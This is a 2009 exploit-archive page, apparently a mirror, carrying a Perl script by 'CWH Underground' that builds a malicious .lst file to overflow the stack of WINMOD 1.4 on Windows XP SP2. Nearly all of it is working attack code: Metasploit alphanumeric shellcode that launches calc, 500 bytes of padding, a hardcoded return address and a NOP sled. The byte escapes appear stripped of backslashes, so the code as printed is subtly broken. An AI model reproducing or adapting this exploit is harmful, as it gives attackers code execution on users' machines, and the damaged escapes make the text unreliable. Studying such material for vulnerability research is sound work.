WINMOD 1.4 (.lst) Local Stack Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : WINMOD 1.4 (.lst) Local Stack Overflow Exploit
# Published : 2009-07-23
# Author : CWH Underground
# Previous Title : Adobe Acrobat 9.1.2 NOS Local Privilege Escalation Exploit (py)
# Next Title : WINMOD 1.4 (.lst) Universal Buffer Overflow Exploit (SEH) #2

#!/usr/bin/perl
#
# Winmod 1.4 (.lst) Local Stack Overflow Exploit
# Exploit by CWH Underground
# Tested on Win XP SP2 EN
#
# Download: http://www.software112.com/products/winmod+download.html
#

print "n==================================================n";
print "    Winmod 1.4 (.lst) Local Stack Overflow Exploit n";
print " n";
print "         Discovered By CWH Underground n";
print "==================================================n";
print "                                              n";
print "  ,--^----------,--------,-----,-------^--,   n";
print "  | |||||||||   `--------'     |          O    n";
print "  `+---------------------------^----------|   n";
print "    `_,-------, _________________________|   n";
print "      / XXXXXX /`|     /                      n";
print "     / XXXXXX /  `   /                       n";
print "    / XXXXXX /______(                        n";
print "   / XXXXXX /                                 n";
print "  / XXXXXX /   .. CWH Underground Hacking Team ..  n";
print " (________(                                   n";
print "  `------'                                    n";
print "                                              n";

## win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
my $shellcode="xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49".
"x49x49x49x49x37x49x49x49x49x49x49x49x51x5ax6ax41".
"x58x50x30x42x31x41x42x6bx42x41x51x32x42x42x32x41".
"x41x30x41x41x42x58x38x42x42x50x75x4bx59x4bx4cx59".
"x78x52x64x63x30x65x50x53x30x4ex6bx57x35x77x4cx6c".
"x4bx61x6cx63x35x73x48x67x71x48x6fx6ex6bx50x4fx45".
"x48x6ex6bx53x6fx61x30x73x31x38x6bx53x79x4ex6bx66".
"x54x6ex6bx46x61x38x6ex30x31x6bx70x6ex79x6ex4cx4f".
"x74x79x50x74x34x44x47x4fx31x59x5ax76x6dx55x51x59".
"x52x68x6bx4ax54x35x6bx71x44x65x74x37x74x31x65x4a".
"x45x6ex6bx73x6fx44x64x55x51x4ax4bx50x66x4cx4bx44".
"x4cx30x4bx6ex6bx53x6fx37x6cx46x61x58x6bx6cx4bx77".
"x6cx6ex6bx46x61x5ax4bx4fx79x31x4cx47x54x37x74x6a".
"x63x74x71x59x50x70x64x6ex6bx51x50x50x30x6ex65x4b".
"x70x72x58x64x4cx6cx4bx71x50x56x6cx4ex6bx52x50x57".
"x6cx6cx6dx4cx4bx63x58x73x38x5ax4bx45x59x4ex6bx4f".
"x70x4cx70x35x50x43x30x63x30x4cx4bx53x58x77x4cx73".
"x6fx56x51x48x76x53x50x66x36x4fx79x39x68x6fx73x39".
"x50x61x6bx30x50x61x78x4ax50x6cx4ax73x34x33x6fx45".
"x38x6dx48x49x6ex6cx4ax46x6ex76x37x69x6fx48x67x45".
"x33x73x51x72x4cx71x73x63x30x41";

my $buf="x41" x 500;
$buf = $buf."x68xD5x85x7C";
$buf = $buf.("x90" x 12);
$buf = $buf.$shellcode;
$buf = $buf."x2E".("x41"x9);

open(FILE,'>cwh_xpl.lst') or die ("[+] Error: cannot open destination filen");
print FILE $buf;
close (FILE);

print "[+] Create exploit file successfuln";
print "[+] File's name is cwh_xpl.lstn";

#####################################################################
#Greetz	     : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK
#Special Thx : asylu3, str0ke, citec.us, milw0rm.com
#####################################################################

# www.Syue.com [2009-07-23]